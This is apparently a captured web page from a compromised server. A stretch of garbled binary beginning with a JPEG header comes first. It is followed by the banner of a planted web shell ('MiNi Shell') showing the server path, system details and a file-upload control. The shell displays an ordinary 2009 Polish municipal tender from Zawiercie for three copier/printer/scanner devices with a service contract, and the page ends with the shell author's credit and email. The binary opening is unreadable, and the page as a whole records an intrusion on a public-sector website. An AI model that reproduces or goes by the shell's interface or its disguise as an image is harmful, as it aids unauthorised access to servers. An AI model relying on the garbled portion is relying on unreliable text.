JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090703/222568-N-2009.html

<p class="kh_header"><b>Zawiercie: Dostawę 3 szt. cyfrowych urządzeń powielająco - drukująco - skanujących wraz z usługą pełnej obsługi serwisowej w okresie 3 lat dla Urzędu Miejskiego w Zawierciu.</b><br>
<b>Numer ogłoszenia: 222568 - 2009; data zamieszczenia: 03.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę 3 szt. cyfrowych urządzeń powielająco - drukująco - skanujących wraz z usługą pełnej obsługi serwisowej w okresie 3 lat dla Urzędu Miejskiego w Zawierciu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa 3 szt. cyfrowych urządzeń powielająco - drukująco - skanujących wraz z usługą pełnej obsługi serwisowej w okresie 3 lat dla Urzędu Miejskiego w Zawierciu.

PODPAKIET I 
Urządzenia powielająco - drukująco - skanujące - 2 szt.
Technologia druku	Laserowa
Format kopii	A5R-A3 (kaseta)
Rozdzielczość kopiowania, drukowania	Kolor min. 600 x 600 dpi
Czarno-białe z wygładzaniem
(2400x600dpi)
Zoom	Min. 25-400% 
Prędkość kopiowania, drukowania	Kolor: min. 11 stron / minutę w formacie
A4
Czarno - biały: min. 35 stron / minutę w
formacie A4 
Pamięć	Min. 384 MB
Czas pierwszej kopii  czarno-białej	Poniżej 7 sekund 
Dysk twardy	min.80GB 
Podawanie papieru	- Min. dwie kasety, każda na min.550
ark. (80g/m2)
- Podajnik ręczny na min.100 ark.
(80g/m2)
Podstawa z podajnikiem papieru	Kaseta min. 500 ark.
Podajnik oryginałów	podajnik z rewersem na min. 100
oryginałów o gramaturze 80g/m2
Podstawa pod urządzenie
Opcjonalna możliwość rozbudowy urządzenia o podajnik dokumentów dużej pojemności
na min. 2500 ark.
Kody dostępu	Min. 1000 kodów departamentowych 
Kopiowanie wielokrotne	Min. 1-999 kopii
Duplex
Gramatura papieru z podajnika ręcznego	Min. 64 g/m2 - 209 g/m2 
Gramatura papieru z kasety	Min. 64 g/m2 - 105 g/m2
Skanowanie sieciowe
Format plików	TIFF, PDF, JPEG
Funkcje skanowania	Skanowanie do e-mail, skanowanie do
folderu sieciowego, FTP 
Interfejs	USB, 10BaseT/100BaseTX
Język opisu strony	PCL5C, PCL6, emulacja PS3
Obsługiwane systemy operacyjne	Windows 98/NT/2000/XP/Vista 32/64,
Linux
Gwarancja	36 miesięcy realizowana zgodnie z
umową serwisową

PODPAKIET II
Urządzenie powielająco - drukująco - skanujące - 1 szt.
Technologia druku	Laserowa
Wyświetlacz	Ciekłokrystaliczny dotykowy panel
Format kopii	A5R-A3
Rozdzielczość kopiowania, drukowania	Min. 600 x 600 dpi;
2400 x 600dpi czarno-białe z
Wygładzaniem
Zoom	Min. 25-400% 
Prędkość kopiowania, drukowania	Kolor: min. 28 stron / minutę w formacie
A4
Czarno - biały: min. 28 stron / minutę w
formacie A4 
Pamięć 	Min. 1,5 GB RAM
Czas pierwszej kopii  czarno-białej	Poniżej 7 sekund 
Dysk twardy	min.80GB
Podawanie papieru	- Min. dwie kasety, każda na min.550
ark. (80g/m2)
- Podajnik ręczny na min.100ark.
(80g/m2)
Obsługiwane formaty	A5R - A3 oraz 320x450, 320x460 mm,
druk na banerze do 303x1200mm
Pokrywa oryginałów
Podstawa pod urządzenie
Opcjonalna możliwość rozbudowy urządzenia o podajnik dokumentów dużej pojemności
na min. 2500 ark.
Opcjonalnie możliwość rozbudowy o finiszer - zszywający  wielopozycyjnie min. 50
arkuszy lub finiszer broszurujący
Kopiowanie wielokrotne	Min. 1-999 kopii
Duplex	obsługa w dupleksie ze wszystkich
kaset papieru o gramaturze do 256g/m2
Gramatura papieru z podajnika ręcznego	Min. 64 g/m2 - 280 g/m2 
Gramatura papieru z kasety	Min. 64 g/m2 - 256 g/m2
Skanowanie sieciowe
Format plików	TIFF, PDF, JPEG, XPS
Funkcje skanowania	Skanowanie do e-mail, skanowanie do 
folderu sieciowego, FTP,  
skanowanie do USB
Interfejs	USB2.0, 10BaseT/100BaseTX 
(obsługa IPv6)
Opcjonalna możliwość rozbudowy
urządzenia o interfejs:	WLAN, Bluetooth
Język opisu strony	PCL6, emulacja PS3, XPS
Gwarancja	36 miesięcy realizowana zgodnie 
z umową serwisową
Dodatkowa funkcjonalność niezbędna dla Wydziału Geodezji:
Wycinanie obszaru czarnego przy kopiowaniu/ skanowaniu obiektów 3D.
Druk z klucza USB.
Pomijanie pustych stron przy skanowaniu i kopiowaniu.
Podgląd skanowanego materiału przed zapisem do pliku na panelu użytkownika.
Możliwość pracy  (kontrolerem e-BRIDGE) z systemem profilowania,
wczytywanie do 16 profili wejściowych CMYK,
wczytywanie do 16 profili wejściowych RGB,
wczytywanie do 64 profili wyjściowych (na media).
Możliwość implementacji karty akceleracyjnej w przypadku skanowania dużej ilości
skanów w formacie PDF (SLIMPDF - kilkukrotnie mniejszy format od zwykłego PDF).

Pełny serwis dla każdego z urządzeń z podpakietu I i II w okresie 3 lat obejmuje:
- dojazd technika do miejsca użytkowania Urządzenia;
- wykonywanie przeglądów zgodnie z zaleceniami producenta Urządzenia;
- dokonywanie napraw oraz kontroli stanu technicznego Urządzenia;
- dostarczanie oraz montaż w Urządzeniu części zamiennych i części zużywających się;
- dostarczanie materiałów eksploatacyjnych objętych opłatami z tytułu obsługi; 
- podstawowe przeszkolenie dwóch pracowników Zamawiającego w zakresie obsługi urządzenia obejmujące:
   x włączanie i wyłączanie urządzenia,
   x uzupełnianie papieru, zmienianie rozmiaru papieru,
   x drukowanie na mediach nietypowych (gruby papier, folia),
   x wykonanie wydruku/kopii, 
   x usuwanie zacięć, wymiana materiałów eksploatacyjnych,
   x wykonywanie okresowych czynności operatorskich,
   x sposoby komunikowania się z urządzeniem, sposób odczytu licznika.
- w okresie obowiązywania umowy Wykonawca zobowiązany jest do dostarczania Zamawiającemu na własny koszt materiałów eksploatacyjnych w postaci tonerów                w terminie 3 dni roboczych od daty zgłoszenia. 

Deklarowana liczba wydruków miesięcznie, za które Zamawiający zapłaci stałe wynagrodzenie w okresie 36 miesięcy:
- podpakiet I:
x urządzenie 1: kopia A4 czarna - 6000 szt., kopia A4 kolorowa - 100 szt.,
x urządzenie 2: kopia A4 czarna - 6000 szt., kopia A4 kolorowa - 100 szt.,
- podpakiet II - urządzenie (1 szt.): kopia A4 czarna - 100 szt., kopia A4 kolorowa - 1000 szt.        
Za przekroczenie limitu wydruku Zamawiający zapłaci kwotę stanowiącą iloczyn ilości kopii albo wydruków ponad limit i ceny odpowiednio czarnej albo kolorowej 1 strony zadeklarowanej w ramach limitu urządzenia objętego danym podpakietem.   
Wykonawca udzieli Zamawiającemu 36 miesięcy gwarancji  na zakupiony towar, na warunkach określonych we umowy.

Wykonawca zapewni przeszkolenie w zakresie administrowania w/w urządzeniami 2 osób wyznaczonych przez Zamawiającego w terminie uzgodnionym przez obie strony, jednak  nie dłuższym niż 15 dni od daty dostarczenia towaru.

Wykonawca zobowiązany będzie dołączyć deklaracje CE dot. urządzeń z podpakietu I i II w formie papierowej wraz z dostarczonym towarem.

Szczegółowy opis przedmiotu zamówienia zawiera również załączony do specyfikacji istotnych warunków zamówienia wzór umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.12.14.30-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych oraz spełniają wymogi art. 22 ust. 1 Pzp.

Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.
W/w  zostaną  uznane  za spełnione jeżeli Wykonawca złoży dokumenty i oświadczenie, o których mowa w pkt. VI specyfikacji..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawca musi załączyć do oferty następujące dokumenty:

1)	Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 2 do SIWZ.
2)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Ponadto Wykonawca złoży wraz z ofertą:
3)	Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 1 do specyfikacji.
4)	Opis techniczny oferowanych urządzeń osobno dla podpakietu I i II (jako załączniki odpowiednio nr 1A i 1B do SIWZ i formularza oferty).
5)	Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, złożony wg wzoru stanowiącego załącznik nr 3 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu).

W/w dokumenty winny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę z umieszczoną klauzulą za zgodność z oryginałem.
Wykonawcy mogą wspólnie ubiegać się o udzielnie niniejszego zamówienia, a wszystkie warunki udziału w postępowaniu, o których mowa w pkt. V SIWZ muszą spełniać oni łącznie. Ich potencjały ludzkie, techniczne, wiedza i doświadczenie, a także sytuacja ekonomiczna i finansowa zostaną zsumowane, aby mogli spełniać warunki udziału w postępowaniu. Przy ocenie spełnienia warunków udziału w postępowaniu, o których mowa w pkt V przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunków będą zsumowane.
Nie spełnienie powyższych wymagań spowoduje wykluczenie wykonawcy.

Oferty przedstawione przez dwa lub więcej podmiotów występujących wspólnie, będą musiały spełniać następujące wymagania:
a)	oferta będzie zawierać informacje i dokumenty wymienione w punkcie VI ppkt 2,  dotyczące każdego partnera konsorcjum. Oświadczenie o spełnianiu warunków udziału w postępowaniu, o którym mowa w ppkt 1 wykonawcy wspólnie ubiegający się o zamówienie złożą oddzielne lub wspólne;
b)	oferta będzie podpisana w taki sposób, by wiązała prawnie wszystkich partnerów;
c)	wszyscy partnerzy będą ponosić odpowiedzialność solidarną za wykonanie umowy zgodnie z jej postanowieniami;
d)	wykonawcy wspólnie ubiegający się o zamówienie ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarciu umowy. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
e)	zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez partnera kierującego lub od wszystkich partnerów łącznie lub od każdego z osobna, albo też w inny sposób ustalony w umowie konsorcjum.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej     Polskiej stosuje się § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz.U. Nr 87, poz. 605 z późn. zm.) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2, 42-400 Zawiercie, Wydział Zamówień Publicznych, pokój nr 202..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2009 godzina 10:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2, Punkt Obsługi Interesanta (Informacja), parter UM..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin realizacji zamówienia: 10 dni od dnia podpisania umowy. Pełny serwis na przedmiotowe urządzenia będzie świadczony w okresie 3 lat od dnia podpisania umowy.

Ogłoszenie zostało zamieszczone w Biuletynie zamówień Publicznych w dniu 03 lipca

Creat By MiNi SheLL
Email: jattceo@gmail.com